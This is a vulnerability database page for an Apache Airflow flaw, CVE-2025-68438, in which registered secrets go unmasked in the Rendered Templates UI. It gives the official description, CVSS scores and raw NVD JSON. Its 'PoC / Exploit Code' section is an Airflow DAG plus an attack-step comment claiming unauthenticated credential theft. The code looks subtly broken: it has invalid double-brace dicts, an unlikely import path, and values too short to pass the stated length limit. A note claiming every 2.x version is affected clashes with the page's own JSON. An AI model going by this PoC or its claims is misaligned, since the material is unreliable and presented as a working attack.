Security Vulnerability Report
中文
CVE-2025-68438 CVSS 7.5 HIGH

CVE-2025-68438

Published: 2026-01-16 11:16:04
Last Modified: 2026-01-21 13:44:44
Source: [email protected]

Description

In Apache Airflow versions before 3.1.6, when rendered template fields in a Dag exceed [core] max_templated_field_length, sensitive values could be exposed in cleartext in the Rendered Templates UI. This occurred because serialization of those fields used a secrets masker instance that did not include user-registered mask_secret() patterns, so secrets were not reliably masked before truncation and display. Users are recommended to upgrade to 3.1.6 or later, which fixes this issue

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:* - VULNERABLE
Apache Airflow < 3.1.6
Apache Airflow 2.x 系列所有版本(在特定配置下可能受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-68438 PoC - Apache Airflow Sensitive Information Exposure # This PoC demonstrates how sensitive data can be exposed in Rendered Templates UI from airflow import DAG from airflow.operators.python import PythonOperator from airflow.utils.helpers import mask_secret import os # Register custom sensitive information for masking # In vulnerable versions, this pattern won't be properly masked mask_secret('my_api_key_12345') mask_secret('super_secret_token_abcdef') def process_data(): # Simulate processing with sensitive credentials config = { 'api_key': 'my_api_key_12345', 'db_password': 'database_secret_pass', 'oauth_token': 'super_secret_token_abcdef', 'aws_access_key': 'AKIAIOSFODNN7EXAMPLE', 'username': 'admin', 'password': 'P@ssw0rd123!' } # Template rendering happens here template_string = """ Connection Configuration: API Key: {{ params.api_key }} DB Password: {{ params.db_password }} OAuth Token: {{ params.oauth_token }} AWS Key: {{ params.aws_access_key }} User: {{ params.username }} Pass: {{ params.password }} """ return template_string with DAG('sensitive_data_exposure_dag', default_args={{'owner': 'airflow'}}, schedule_interval=None, catchup=False) as dag: expose_sensitive = PythonOperator( task_id='expose_sensitive_data', python_callable=process_data, params={{ 'api_key': 'my_api_key_12345', 'db_password': 'database_secret_pass', 'oauth_token': 'super_secret_token_abcdef', 'aws_access_key': 'AKIAIOSFODNN7EXAMPLE', 'username': 'admin', 'password': 'P@ssw0rd123!' }} ) # Attack Vector: # 1. Access Airflow Web UI at /render/{dag_id}/{task_id}/{execution_date} # 2. When template length exceeds max_templated_field_length (default: 4096 chars) # 3. Sensitive values registered via mask_secret() will be exposed in plaintext # 4. Attacker can extract credentials without authentication

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68438", "sourceIdentifier": "[email protected]", "published": "2026-01-16T11:16:03.760", "lastModified": "2026-01-21T13:44:43.577", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Apache Airflow versions before 3.1.6, when rendered template fields in a Dag exceed [core] max_templated_field_length, sensitive values could be exposed in cleartext in the Rendered Templates UI. This occurred because serialization of those fields used a secrets masker instance that did not include user-registered mask_secret() patterns, so secrets were not reliably masked before truncation and display.\n\nUsers are recommended to upgrade to 3.1.6 or later, which fixes this issue"}, {"lang": "es", "value": "En versiones de Apache Airflow anteriores a la 3.1.6, cuando los campos de plantilla renderizados en un DAG exceden [core] max_templated_field_length, valores sensibles podrían quedar expuestos en texto claro en la interfaz de usuario de Plantillas Renderizadas. Esto ocurrió porque la serialización de esos campos utilizaba una instancia de enmascarador de secretos que no incluía patrones mask_secret() registrados por el usuario, por lo que los secretos no se enmascaraban de forma fiable antes de la truncación y visualización.\n\nSe recomienda a los usuarios actualizar a la 3.1.6 o posterior, lo que corrige este problema."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.1.0", "versionEndExcluding": "3.1.6", "matchCriteriaId": "3200C37B-AA6B-4DDC-9CFB-93D59243BF2A"}]}]}], "references": [{"url": "https://lists.apache.org/thread/55n7b4nlsz3vo5n4h5lrj9bfsk8ctyff", "source": "[email protected]", "tags": ["Mailing List", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/01/15/5", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.